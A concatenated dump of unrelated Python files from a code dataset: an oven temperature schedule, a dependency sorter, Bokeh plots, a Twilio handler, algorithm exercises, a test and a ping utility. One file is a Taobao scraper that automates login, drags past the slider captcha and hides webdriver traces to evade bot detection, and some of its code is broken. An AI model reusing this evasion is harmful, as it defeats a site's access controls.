\"https://20dicprueba.github.io/temp.html\"\nif(DEBUG==False): URL = \"http://192.168.100.100/atmoweb?Temp1Read=\"\nfile = \"pruebaGuardado.txt\"\n#------------------------------------------------------------------------------\n\nprint( \"starting...\")\nrt = RPT(1, dataMiner,URL,file) # it auto-starts, no need of rt.start()\n\ntry:\n \n timestop = 120*60\n timestop1 = 240*60\n timestop2 = 180*60\n \n# #Ingresar la primera temperatura\n# print(\"30 grados centigrados\")\n# if(DEBUG): print (\"dummy 30\")\n# URLA = \"http://192.168.100.100/atmoweb?TempSet=30\" \n# if(DEBUG==False): r = requests.get(URLA)\n# sleep(timestop)\n#------------------------------------------------------------------------------ \n #Ingresar la primera temperatura\n# print(\"25 grados centigrados\")\n# if(DEBUG): print (\"dummy 25\")\n# URLA = \"http://192.168.100.100/atmoweb?TempSet=25\" \n# if(DEBUG==False): r = requests.get(URLA)\n# #sleep(timestop)\n# sleep(timestop1)\n \n #Ingresar la segunda temperatura\n print(\"30 grados centigrados\")\n if(DEBUG): print (\"dummy 30\")\n URLA = \"http://192.168.100.100/atmoweb?TempSet=30\" \n if(DEBUG==False): r = requests.get(URLA)\n #sleep(timestop)\n sleep(timestop2)\n \n #Ingresar la tercera temperatura\n print(\"40 grados centigrados\")\n if(DEBUG): print (\"dummy 40\")\n URLA = \"http://192.168.100.100/atmoweb?TempSet=40\" \n if(DEBUG==False): r = requests.get(URLA)\n sleep(timestop)\n \n #Ingresar la cuarta temperatura\n print(\"50 grados centigrados\")\n if(DEBUG): print (\"dummy 50\")\n URLA = \"http://192.168.100.100/atmoweb?TempSet=50\" \n if(DEBUG==False): r = requests.get(URLA)\n sleep(timestop)\n \n #Ingresar la quinta temperatura\n print(\"60 grados centigrados\")\n if(DEBUG): print (\"dummy 60\")\n URLA = \"http://192.168.100.100/atmoweb?TempSet=60\" \n if(DEBUG==False): r = requests.get(URLA)\n sleep(timestop)\n \n #Ingresar la sexta temperatura\n print(\"70 grados centigrados\")\n if(DEBUG): print (\"dummy 70\")\n URLA = \"http://192.168.100.100/atmoweb?TempSet=70\" \n if(DEBUG==False): r = requests.get(URLA)\n sleep(timestop)\n \n #Ingresar la septima temperatura\n print(\"80 grados centigrados\")\n if(DEBUG): print (\"dummy 80\")\n URLA = \"http://192.168.100.100/atmoweb?TempSet=80\" \n if(DEBUG==False): r = requests.get(URLA)\n sleep(timestop)\n \n #Ingresar la octava temperatura\n print(\"90 grados centigrados\")\n if(DEBUG): print (\"dummy 90\")\n URLA = \"http://192.168.100.100/atmoweb?TempSet=90\" \n if(DEBUG==False): r = requests.get(URLA)\n sleep(timestop)\n \n print(\"20 grados centigrados\")\n if(DEBUG): print (\"dummy 20\")\n URLA = \"http://192.168.100.100/atmoweb?TempSet=20\" \n if(DEBUG==False): r = requests.get(URLA)\n \nexcept KeyboardInterrupt:\n print(\"Something went wrong\")\n \nfinally:\n rt.stop()\n ","sub_path":"HornoMemmert/version3/arreglo.py","file_name":"arreglo.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"484562903","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDependency topology helper.\n\"\"\"\n\nimport argparse\nimport functools\nimport sys\nimport re\nimport os\n\nimport networkx as nx\n\nINSTALLER = 'install.sh'\nRE_DEPENDS = re.compile(r'^.*#\\s*depends-on\\s*:(?P.*)$')\nRE_SATISFIES = re.compile(r'^.*#\\s*satisfies\\s*:(?P.*)$')\n\ndef read_dependencies(filename):\n \"\"\"Find dependency or satisfying list of an installer.\n\n Functions looks for two string patters:\n - # depends-on: \n - # satisfies: \n The former one defines dependencies of an installer, the latter defines\n dependencies this installer provides for others.\n\n Args:\n filename: An installer full name.\n\n Returns:\n A tuple, where the first element is True if the second element defines\n dependencies, and False if it defines satisfying list.\n \"\"\"\n depends = list()\n satisfies = list()\n with open(filename, 'r') as handler:\n dep_or_sat = True\n for line in handler.readlines():\n match = RE_DEPENDS.match(line)\n if not match:\n match = RE_SATISFIES.match(line)\n if not match:\n continue\n dep_or_sat = False\n\n names = match.groupdict().get('names', '')\n names = names.split(',')\n names = list(map(str.rstrip, names))\n names = list(map(str.lstrip, names))\n if dep_or_sat:\n depends.extend(names)\n else:\n satisfies.extend(names)\n\n return depends, satisfies\n\ndef find_topological_order(directory, target=None):\n graph = nx.DiGraph()\n\n # First, walk the installers and find real providers\n for root, _, files in os.walk(directory):\n if INSTALLER in files:\n name = os.path.basename(root)\n graph.add_node(name, transitive=False)\n\n # Second, find all dependees and dependers\n for root, _, files in os.walk(directory):\n if INSTALLER in files:\n name = os.path.basename(root)\n dependencies, satisfies = read_dependencies(os.path.join(root, INSTALLER))\n\n for dependence in dependencies:\n # If by now the dependence does not have a node it does not have a real\n # provider, so we assume it is transitive, i.d. provided by something\n # with different name\n if not graph.has_node(dependence):\n graph.add_node(dependence, transitive=True)\n\n # Set edge from dependee to its provider\n add_edge = functools.partial(lambda a,b: graph.add_edge(b,a), name)\n list(map(add_edge, dependencies))\n\n for sat in satisfies:\n # If there is something that tries to satisfy already satisfied\n # dependency we consider this an error\n if graph.has_node(sat) and len(list(graph.predecessors(sat))):\n print((\"{} tries to satisfy already existing installer {}\".format(name, sat)))\n return False, None\n graph.add_node(sat, transitive=True)\n\n # Set edge from transitive provider to its real provider\n add_edge = functools.partial(lambda a,b: graph.add_edge(a,b), name)\n list(map(add_edge, satisfies))\n\n # print graph.edges()\n # sys.exit(0)\n\n # Not all dependencies are provided by installers of the same name. By\n # collapsing the graph on these 'satisfying' dependencies we point a dependee\n # to a right installer.\n nodes_to_remove = list()\n for node, transitive in graph.nodes(data='transitive'):\n if not transitive:\n continue\n\n dependees = list(graph.successors(node))\n providers = list(graph.predecessors(node))\n assert len(providers) == 1, 'Must be exactly one provider, node: {}, dependees: {}, providers: {}'.format(node, dependees, providers)\n\n # Remove transitive node with all its edges\n nodes_to_remove.append(node)\n\n # Reconnect the graph\n add_edge = functools.partial(graph.add_edge, providers[0])\n list(map(add_edge, dependees))\n\n for node in nodes_to_remove:\n graph.remove_node(node)\n\n if not nx.is_directed_acyclic_graph(graph):\n print((\"Found dependency cycle: {}\".format(nx.find_cycle(graph))))\n return False, None\n\n if target:\n closure = set([target])\n while True:\n new = closure | set(sum(list(map(list, list(map(graph.predecessors, closure)))), []))\n if closure == new:\n break\n closure = new\n return True, list(nx.topological_sort(graph.subgraph(closure)))\n\n return True, list(nx.topological_sort(graph))\n\ndef create_menu():\n parser = argparse.ArgumentParser(prog='Topo')\n parser.add_argument('directory', metavar='DIR')\n parser.add_argument('--for', dest='target', default=None)\n return parser\n\ndef main():\n parser = create_menu()\n options = parser.parse_args()\n\n success, order = find_topological_order(options.directory, options.target)\n if not success:\n sys.exit(1)\n\n print((' '.join(order)))\n sys.exit(0)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"301181897","text":"import asyncio\nimport json\nimport pickle\nimport random\nimport re\nimport time\n\nimport aiohttp\nfrom bs4 import BeautifulSoup as bs\nfrom pyppeteer import launch\nfrom retrying import retry\nfrom setting import *\nfrom motor.motor_asyncio import AsyncIOMotorClient\nimport pymongo\n\n\n\n\n\nclass TBBrowser:\n\n def __init__(self, kwargs):\n for k, v in kwargs.items():\n self.__setattr__(k, v)\n self.browser = None\n self.spider_urls = []\n self.tmp_url = None\n self.password = None\n self.username = None\n self.login_url = None\n self.tmp_count = 0\n\n async def __create_browser(self, kwargs):\n self.browser = await launch(kwargs)\n\n @classmethod\n async def create_render(cls, kwargs):\n cls = cls(kwargs)\n browser_args = kwargs.get('browser_args', None)\n await cls.__create_browser(browser_args)\n return cls\n\n async def __base_page(self, url, timeout=15, delay=0):\n page = await self.browser.newPage()\n if self.page_jss:\n for js in self.page_jss:\n await page.evaluateOnNewDocument(js)\n if delay>0:\n await page.waitFor(delay)\n defaultViewport = self.defaultViewport or None\n await page.setViewport(defaultViewport)\n\n user_agent = self.user_agent or None\n await page.setUserAgent(user_agent)\n if self.cookies:\n for cookie in self.cookies:\n await page.setCookie(cookie)\n await page.goto(url)\n\n return page\n\n async def page(self, url, timeout=15, delay=0):\n return await self.__base_page(url, timeout, delay)\n\n async def close(self):\n try:\n await self.browser.close()\n except:\n pass\n\n async def spider(self, db_ip, db_port, db_name, db_collection, tiemout=15, delay=10):\n mongo = pymongo.MongoClient(db_ip, db_port)\n collection = mongo[db_name][db_collection]\n page = await self.page('https://www.taobao.com/', tiemout, delay)\n for url in self.spider_urls:\n item = None\n while not item:\n await page.goto(url)\n await page.waitFor(delay)\n html = await page.content()\n item = self.parse(html)\n print(item)\n collection.insert_one(item)\n await page.close()\n\n\n async def set_cookies(self, login_url, username, password):\n self.login_url = login_url\n self.username = username\n self.password = password\n if login_url == None and self.login_url:\n login_url = self.login_url\n username = self.username\n password = self.password\n page = await self.page(login_url)\n await page.waitForSelector(\"#J_QRCodeLogin > div.login-links > a.forget-pwd.J_Quick2Static\")\n await page.click(\"#J_QRCodeLogin > div.login-links > a.forget-pwd.J_Quick2Static\")\n await page.waitForSelector(\"#TPL_username_1\")\n await page.type(\"#TPL_username_1\", username, {'delay': random.randint(100,115)*0.5})\n await page.type(\"#TPL_password_1\", password, {'delay': random.randint(100,115)*0.7})\n\n await page.waitFor(5)\n try:\n slider = await page.Jeval('#nocaptcha', 'node => node.style')\n except:\n slider = None\n\n if slider:\n flag, page = await self.mouse_slide(page)\n if flag:\n await page.click(\"#J_SubmitStatic\")\n time.sleep(2)\n cookies = await page.cookies()\n self.cookies = cookies\n else:\n await page.click(\"#J_SubmitStatic\")\n await page.waitFor(20)\n await page.waitForNavigation()\n try:\n global error # 检测是否是账号密码错误\n print(\"error_1:\", error)\n error = await page.Jeval('.error', 'node => node.textContent')\n print(\"error_2:\", error)\n except Exception as e:\n error = None\n finally:\n await page.waitFor(10)\n self.tmp_url = page.url\n\n if error:\n print('确保账户安全重新入输入')\n # 程序退出。\n\n else:\n print(page.url)\n cookies = await page.cookies()\n self.cookies = cookies\n\n\n q = await page.waitForSelector(\"#q\")\n if q:\n print('登录成功')\n cookies = await page.cookies()\n self.cookies = cookies\n await page.close()\n\n @staticmethod\n def retry_if_result_none(result):\n return result is None\n\n @retry(retry_on_result=retry_if_result_none)\n async def mouse_slide(self, page=None):\n await asyncio.sleep(2)\n try:\n await page.hover(\"#nc_1_n1z\")\n await page.mouse.down()\n await page.mouse.move(2000,0,{'delay': random.randin(1000,2000)})\n await page.mouse.up()\n except Exception as e:\n return None, page\n else:\n await asyncio.sleep(2)\n slide_again = await page.Jeval('.nc-lang-cnt', 'node => node.textContent')\n if slide_again != '验证通过':\n return None, page\n else:\n return 1, page\n\n async def clear_webdriver(self, page):\n if self.page_jss:\n for js in self.page_jss:\n await page.evaluate(js)\n return page\n\n async def find_pages(self, search_url, keyword, sign='tmall'):\n try:\n page = await self.page(search_url)\n await page.waitFor(5)\n # await page.waitForNavigation()\n await page.type(\"#q\", keyword)\n await page.click(\"#J_SearchForm > button\")\n await page.waitForNavigation()\n await page.querySelector(\"#mainsrp-pager > div > div > div > div.total\")\n html = await page.content()\n total_pages = self.__total_pages(html)\n base_url = page.url\n await page.close()\n # return base_url, total_pages\n if sign == 'tmall':\n sign = \"&filter_tianmao=tmall\"\n else:\n sign = \"\"\n self.spider_urls = [base_url + f\"&s={44 * (i - 1)}\" + sign for i in range(1, total_pages + 1)]\n except Exception as e:\n print(e)\n time.sleep(1e4)\n\n def __total_pages(self, html):\n soup = bs(html, 'lxml')\n total_pages = soup.find(\"div\", attrs={'class':'total'}).text\n total_pages = re.findall(r\"\\d+\\.?\\d*\", total_pages)[0]\n return int(total_pages)\n\n def save_cookies(self):\n if self.cookies:\n cookies = {}\n for cookie in self.cookies:\n cookies.setdefault(cookie.get('name'), cookie.get('value'))\n with open('cookies.pk', 'wb') as f:\n pickle.dump(cookies, f)\n print('保持cookies成功!')\n\n def save_spider_urls(self):\n if self.spider_urls:\n with open(\"spider_urls.csv\", 'w') as f:\n for url in self.spider_urls:\n f.write(url+'\\n')\n print('更新urls')\n\n def parse(self, html):\n try:\n item = re.search(r'g_page_config = ({.*?});', html).group(1)\n item = json.loads(item)\n return item\n except:\n return None\n\n\n\n\nasync def main():\n browser = await Browser.create_render(browser_args)\n await browser.set_cookies(**spider_args.get('login_info'))\n await browser.find_pages(**spider_args.get('search_info'))\n browser.save_cookies()\n browser.save_spider_urls()\n await browser.spider('localhost', 27017, 'taobao', 'yanshuang')\n await browser.close()\n\n\n\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n spider_urls = loop.run_until_complete(main())\n\n","sub_path":"core/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225419002","text":"# Copyright 2013 Huawei Technologies Co.,LTD.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\n\nfrom rally.benchmark.scenarios.cinder import volumes\nfrom tests import test\n\n\nCINDER_VOLUMES = \"rally.benchmark.scenarios.cinder.volumes.CinderVolumes\"\n\n\nclass CinderServersTestCase(test.TestCase):\n\n @mock.patch(CINDER_VOLUMES + \".sleep_between\")\n @mock.patch(CINDER_VOLUMES + \"._delete_volume\")\n @mock.patch(CINDER_VOLUMES + \"._create_volume\")\n def _verify_create_and_delete_volume(self, mock_create, mock_delete,\n mock_sleep):\n fake_volume = object()\n mock_create.return_value = fake_volume\n volumes.CinderVolumes.create_and_delete_volume(1, 10, 20,\n fakearg=\"f\")\n\n mock_create.assert_called_once_with(1, fakearg=\"f\")\n mock_sleep.assert_called_once_with(10, 20)\n mock_delete.assert_called_once_with(fake_volume)\n\n def test_create_and_delete_volume(self):\n self._verify_create_and_delete_volume()\n","sub_path":"tests/benchmark/scenarios/cinder/test_volumes.py","file_name":"test_volumes.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317890101","text":"class STNode(object):\n def __init__(self, start, end):\n\n self.start = start\n self.end = end\n self.total = 0 \n self.lazy = 0\n\n self.left = None\n self.right = None\n \n\nclass SegmentTree(object):\n \"\"\"\n SegmentTree with lazy propagation\n - update(max) \n - query(max) \n \"\"\"\n def __init__(self, nums):\n # helper function to create the tree from input array\n def createTree(nums, l, r):\n if l == r:\n node = STNode(l, r)\n node.total = nums[l]\n return node\n elif l > r:\n return None\n else:\n mid = (l+r) // 2\n node = STNode(l, r)\n node.left = createTree(nums, l, mid)\n node.right = createTree(nums, mid+1, r)\n node.total = node.left.total + node.right.total\n return node\n self.root = createTree(nums,0,len(nums)-1)\n \n def update(self, i, j, val):\n # update range [i..j] lazily\n \n # helper function to update a value\n def updateVal(root, i, j, val):\n \n if root.lazy != 0: #this node is lazy\n root.total = max(root.lazy, root.total)\n if root.start != root.end:\n root.left.lazy = max(root.lazy, root.left.lazy)\n root.right.lazy = max(root.lazy, root.right.lazy)\n root.lazy = 0\n \n if j < i or root.start > j or root.end < i: #out of range, escape\n return root.total\n \n if i <= root.start and root.end <= j: #fully within \n root.total = max(val, root.total)\n if root.start != root.end:\n root.left.lazy = max(val, root.left.lazy)\n root.right.lazy = max(val, root.right.lazy)\n return root.total\n \n updateVal(root.left, i , j, val)\n updateVal(root.right, i , j, val)\n\n root.total = max(root.left.total,root.right.total) # merge updates\n return root.total\n\n return updateVal(self.root, i, j, val)\n\n def query(self, i, j):\n #helper functuion to calculate the range sum\n def rangeQuery(root, i, j):\n if j < i or root.start > j or root.end < i: #out of range, escape\n return -float(\"inf\")\n \n if root.lazy != 0: #this node is lazy\n root.total = max(root.lazy, root.total)\n if root.start != root.end:\n root.left.lazy = max(root.lazy, root.left.lazy)\n root.right.lazy = max(root.lazy, root.right.lazy)\n root.lazy = 0\n \n if i <= root.start and root.end <= j: #fully within \n return root.total\n \n mid = (root.start + root.end) // 2\n if j <= mid:\n return rangeQuery(root.left, i, j)\n elif i >= mid+1:\n return rangeQuery(root.right, i, j)\n else:\n return max(rangeQuery(root.left, i, mid), rangeQuery(root.right, mid+1, j))\n \n return rangeQuery(self.root, i, j)\n \n \nclass Solution(object):\n def fallingSquares(self, positions):\n \"\"\"\n :type positions: List[List[int]]\n :rtype: List[int]\n \"\"\"\n coords = set()\n for left, size in positions:\n coords.add(left)\n coords.add(left + size - 1)\n index = {x: i for i, x in enumerate(sorted(coords))}\n \n tree = SegmentTree( [0]*len(index) )\n best = 0\n ans = []\n for left, size in positions:\n L, R = index[left], index[left + size - 1]\n h = tree.query(L, R) + size\n tree.update(L, R, h)\n best = max(best, h)\n ans.append(best)\n\n return ans\n","sub_path":"Falling-Squares.py","file_name":"Falling-Squares.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"338339441","text":"import pandas as pd\nimport numpy as np\n\nfrom bokeh.io import output_file, show\nfrom bokeh.models import *\nfrom bokeh.plotting import figure\n\nfrom bokeh.transform import transform\n\n#Layout\nfrom bokeh.layouts import column\nfrom bokeh.embed import components\n#widgets\nfrom bokeh.models import Slider,HoverTool, CustomJS, Button, RadioButtonGroup\n#events\nfrom bokeh.events import ButtonClick\n\n\n#Node link\nimport networkx as nx\nfrom bokeh.models import Plot, Range1d, MultiLine, Circle, HoverTool, TapTool, BoxSelectTool\nfrom bokeh.models.graphs import from_networkx, NodesAndLinkedEdges, EdgesAndLinkedNodes\nfrom bokeh.palettes import Spectral4\n\n\n# DATA EXTRACTION (.csv -> dataframe)\n\ndef extractData(filePath):\n df_data = pd.read_csv(filePath, sep=';', index_col = False, na_filter=False, skip_blank_lines=False)\n df_data.set_index('Unnamed: 0', inplace=True)\n #set column and row names\n df_data.columns.name = 'AuthorX'\n df_data.index.name = \"AuthorY\"\n return df_data\n\ndef sliceData(df, size):\n df_data_test = df.iloc[0:size, 0:size]\n return df_data_test\n\ndef stackDataframe(df):\n df_stacked = pd.DataFrame(df.stack(), columns=['sim']).reset_index()\n return df_stacked\n\ndef toSource(df_stacked):\n source = ColumnDataSource(df_stacked)\n return source\n\ndef sortDataframe(df):\n df_sorted = df.sort_index(axis=0, level=None, ascending=True, inplace=False, kind='quicksort', na_position='last', sort_remaining=True, by=None)\n df_sorted = df_sorted.sort_index(axis=1, level=None, ascending=True, inplace=False, kind='quicksort', na_position='last', sort_remaining=True, by=None)\n return df_sorted\n\ndef generateRange(df):\n # Assure the order of the index and columns\n column_list = list(df.columns)\n index_list = list(df.index)\n index_list.reverse()\n return column_list, index_list\n\ndef createWidgets(df_similarity):\n\n #color mapper\n mapper = LinearColorMapper(palette= \"Viridis256\", low=df_similarity.sim.min(), high=df_similarity.sim.max())\n color_bar = ColorBar(color_mapper=mapper, location=(0, 0),\n ticker=BasicTicker(desired_num_ticks=10))\n \n return mapper, color_bar\ndef createMatrix(width, height, column_list_original, index_list_original, mapper, color_bar, source_normal):\n #Color mapper\n \n #Hover information\n hover = HoverTool()\n hover.tooltips = [\n (\"(Author1, Author2)\", \"(@AuthorX, @AuthorY)\"),\n (\"Similarity rate\", \"@sim\"),\n (\"Index\", \"@index\")\n ]\n #Basic interaction tools\n TOOLS = \"save,pan,box_zoom,reset,wheel_zoom\"\n #Graph grid and properties\n figure_matrix = figure(plot_width = width, plot_height=height, sizing_mode = \"scale_both\",\n x_range=column_list_original, y_range=index_list_original, #feeding columns and range\n toolbar_location=\"below\", tools=TOOLS, x_axis_location=\"above\")\n\n r = figure_matrix.rect(x='AuthorX', y='AuthorY', width=1, height=1, source=source_normal,#feeding x,y for each square\n line_color=None, fill_color=transform('sim', mapper))\n\n figure_matrix.tools.append(hover)\n figure_matrix.add_layout(color_bar, 'right')\n figure_matrix.axis.axis_line_color = None\n figure_matrix.axis.major_tick_line_color = None\n figure_matrix.axis.major_label_text_font_size = \"5pt\"\n figure_matrix.axis.major_label_standoff = 0\n figure_matrix.xaxis.major_label_orientation = np.pi/2\n return figure_matrix\n\n\n\n\n# ----------------------------------> Plotting the graph <---------------------------------- #\ndef nodeLink(df_data):\n plot_dimension = 800\n plot_range = (plot_dimension / 2)\n # TOOLS = \"hover,save,pan,box_zoom,reset,wheel_zoom, point_draw\"\n plot = Plot(x_range=Range1d(-plot_range, plot_range), y_range=Range1d(-plot_range, plot_range), output_backend=\"webgl\", \n width = plot_dimension, height = plot_dimension, sizing_mode = \"scale_both\")\n df_raw = pd.DataFrame(df_data.stack(), columns=['edge_weight'])\n df_refined = df_raw[df_raw['edge_weight'] > 0.3].reset_index()\n \n G = nx.from_pandas_dataframe(df_refined, 'AuthorY', 'AuthorX', 'edge_weight')\n \n graph = from_networkx(G, nx.circular_layout, scale=(plot_range * 0.8), center=(0,0))\n # formatting the dataframe into a stacked version that represents the start_node, end_node, and edge_weight\n # rendering the nodes in the graph\n graph.node_renderer.glyph = Circle(size=15, fill_color=Spectral4[0]) # Rendering every node as a circle\n graph.node_renderer.selection_glyph = Circle(size=15, fill_color=Spectral4[2]) # When you select the node, it become orange\n graph.node_renderer.hover_glyph = Circle(size=15, fill_color=Spectral4[1]) # When you hover the node, it become green\n\n # rendering the edges in the graph\n graph.edge_renderer.glyph = MultiLine(line_color=\"#CCCCCC\", line_alpha=0.8, line_width=5) # Rendering every edge as a line\n graph.edge_renderer.selection_glyph = MultiLine(line_color=Spectral4[2], line_width=5) # When you select a node, the connected egdes become orange\n graph.edge_renderer.hover_glyph = MultiLine(line_color=Spectral4[1], line_width=5) # When you hover a node, the connected edges become green\n\n graph.selection_policy = NodesAndLinkedEdges()\n graph.inspection_policy = NodesAndLinkedEdges() #EdgesAndLinkedNodes() (<-- does not work) #NodesAndLinkedEdges()\n\n plot.add_tools(HoverTool(tooltips=[(\"Name\", \"@index\")]), TapTool(), BoxSelectTool())\n plot.renderers.append(graph)\n\n return plot\n\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"158455913","text":"\n\n#calss header\nclass _SPOTLIGHT():\n\tdef __init__(self,): \n\t\tself.name = \"SPOTLIGHT\"\n\t\tself.definitions = [u'a lamp whose beam can be directed, or a circle of light produced by such a lamp', u'(of a person) receiving a lot of public attention: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_spotlight.py","file_name":"_spotlight.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"441713941","text":"import logging\nimport random\n\nimport twilio.twiml\nimport webapp2\nfrom twilio.util import RequestValidator\n\nimport response_strings\nimport strings\nfrom models.account import Account\nfrom models.response import get_response\n\n\nclass CallHandler(webapp2.RequestHandler):\n def get(self):\n\n # Validate that request came from Twilio service.\n validator = RequestValidator(strings.AUTH_TOKEN)\n url = self.request.url\n url = url.replace(\"http\", \"https\")\n signature = self.request.headers.get(\"X-Twilio-Signature\", \"\")\n\n if not validator.validate(url, {}, signature):\n logging.warn(\"Request did not come from Twilio.\")\n self.response.status = 403\n return\n\n phone = self.request.get(\"From\", None)\n account = Account.query().filter(Account.phone == phone).get()\n\n # Sending messages separately, send empty TwiML for now.\n twiml = twilio.twiml.Response()\n\n response = get_response(response_strings.CALL_HELLO, response_strings.VAR_NAME)\n\n if account and account.first:\n response = response.replace(response_strings.VAR_NAME, account.first)\n else:\n response = response.replace(response_strings.VAR_NAME, \"\")\n\n twiml.addSay(response)\n\n tracks = [\n \"better_things\",\n \"dare\",\n \"enchanted\",\n \"makes_me_wonder\",\n \"the_reeling\",\n \"viva_la_vida\"\n ]\n\n track_num = random.randint(0, len(tracks) - 1)\n\n twiml.addPlay(self.request.application_url + \"/static/mp3/\" + tracks[track_num] + \".mp3\")\n\n response = get_response(response_strings.CALL_GOODBYE)\n\n twiml.addSay(response)\n twiml.addHangup()\n\n self.response.write(twiml)\n","sub_path":"controllers/call_handler.py","file_name":"call_handler.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"277532316","text":"# -*- coding:utf-8 -*-\nclass Solution:\n # 返回[a,b] 其中ab是出现一次的两个数字\n def FindNumsAppearOnce(self, array):\n # write code here\n diff = 0\n for num in array:\n diff ^= num\n rightBit = self.RightBit(diff)\n num1, num2 = 0, 0\n for num in array:\n if num & rightBit == rightBit:\n num1 ^= num\n else:\n num2 ^= num\n return [num1, num2]\n\n def RightBit(self, num):\n if not num:\n return 0\n rightBit = 1\n while num & rightBit != rightBit:\n rightBit = rightBit << 1\n return rightBit\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.FindNumsAppearOnce([121, 23, 23, 421, 33, 33]))\n","sub_path":"practice/FindNumsAppearOnce.py","file_name":"FindNumsAppearOnce.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"6185765","text":"import sys\nimport os\nimport yaml\nimport logging\nimport types\n\nfrom .misc import Config\n\n\"\"\"\nThe common.py script is where all globally accessable variables and instances\nare set up.\n\"\"\"\n\n\nconf = Config()\n\nclass Log():\n\tdef __init__(self, config = {}):\n\t\tpass\n\n\tdef logger(self):\n\t\tlogger = logging.getLogger('app')\n\t\thdlr = logging.FileHandler(conf.app_dir() + '/data/log/error.log', mode='a+')\n\t\tformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\t\thdlr.setFormatter(formatter)\n\t\tlogger.addHandler(hdlr)\n\t\tlogger.setLevel(logging.DEBUG)\n\t\treturn logger\n\n\tdef bizz(self):\n\t\tlogger = logging.getLogger('biz')\n\t\thdlr = logging.FileHandler(conf.app_dir() + '/data/log/bizz.log', mode='a+')\n\t\tformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\t\thdlr.setFormatter(formatter)\n\t\tlogger.addHandler(hdlr)\n\t\tlogger.setLevel(logging.DEBUG)\n\t\treturn logger\n\nlogger = Log({}).logger()\nbizz = Log({}).bizz()\n","sub_path":"kpapp/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"200926252","text":"# -*- coding: utf-8 -*-\n'''\nЗадание 12.2\n\n\nФункция check_ip_addresses из задания 12.1 принимает только список адресов,\nно было бы удобно иметь возможность указывать адреса с помощью диапазона, например, 192.168.100.1-10.\n\nВ этом задании необходимо создать функцию convert_ranges_to_ip_list,\nкоторая конвертирует список IP-адресов в разных форматах в список, где каждый IP-адрес указан отдельно.\n\nФункция ожидает как аргумент список IP-адресов и/или диапазонов IP-адресов.\n\nЭлементы списка могут быть в формате:\n* 10.1.1.1\n* 10.1.1.1-10.1.1.10\n* 10.1.1.1-10\n\nЕсли адрес указан в виде диапазона, надо развернуть диапазон в отдельные адреса, включая последний адрес диапазона.\nДля упрощения задачи, можно считать, что в диапазоне всегда меняется только последний октет адреса.\n\nФункция возвращает список IP-адресов.\n\n\nНапример, если передать функции convert_ranges_to_ip_list такой список:\n['8.8.4.4', '1.1.1.1-3', '172.21.41.128-172.21.41.132']\n\nФункция должна вернуть такой список:\n['8.8.4.4', '1.1.1.1', '1.1.1.2', '1.1.1.3', '172.21.41.128',\n '172.21.41.129', '172.21.41.130', '172.21.41.131', '172.21.41.132']\n\n'''\n\nimport subprocess\nimport argparse\nfrom task_12_1 import check_ip_addresses\nimport ipaddress\n\ndef count_integer(a, b):\n \"\"\"\n This function counts the number of objects between variables a and b.\n \"\"\"\n x = 0\n status = True\n while status:\n if a == b:\n x = x + 1\n status = False\n else:\n a = a + 1\n x = x + 1\n return x\n\nif __name__ == \"__main__\":\n #parser\n parser = argparse.ArgumentParser(description='Ping script')\n parser.add_argument('ip_list', action='store', help='Enter ip-address-list just like: 192.168.1.1-10 or 192.168.1.1-192.168.1.10 or 192.168.1.1')\n args = parser.parse_args()\n yes = []\n no = []\n\n if '-' in args.ip_list:\n lists1, lists2 = args.ip_list.split('-')\n lis1 = int(lists1.split('.')[-1])\n lis2 = int(lists2.split('.')[-1])\n start = ipaddress.ip_address(lists1)\n x = count_integer(lis1, lis2)\n for line in range(x):\n status = check_ip_addresses(start)\n if status:\n yes.append(start)\n start = start + 1\n else:\n no.append(start)\n start = start + 1\n else:\n status = check_ip_addresses(args.ip_list)\n start = ipaddress.ip_address(args.ip_list)\n if status:\n yes.append(start)\n else:\n no.append(start)\n print('Available address list: ',yes)\n print('Unavailable address list: ', no)\n\"\"\"\n17:56 $ ./task_12_2.py 192.168.1.1-3\nI'm ping 192.168.1.1 right now, wait.\nI'm ping 192.168.1.2 right now, wait.\nI'm ping 192.168.1.3 right now, wait.\nAvailable address list: 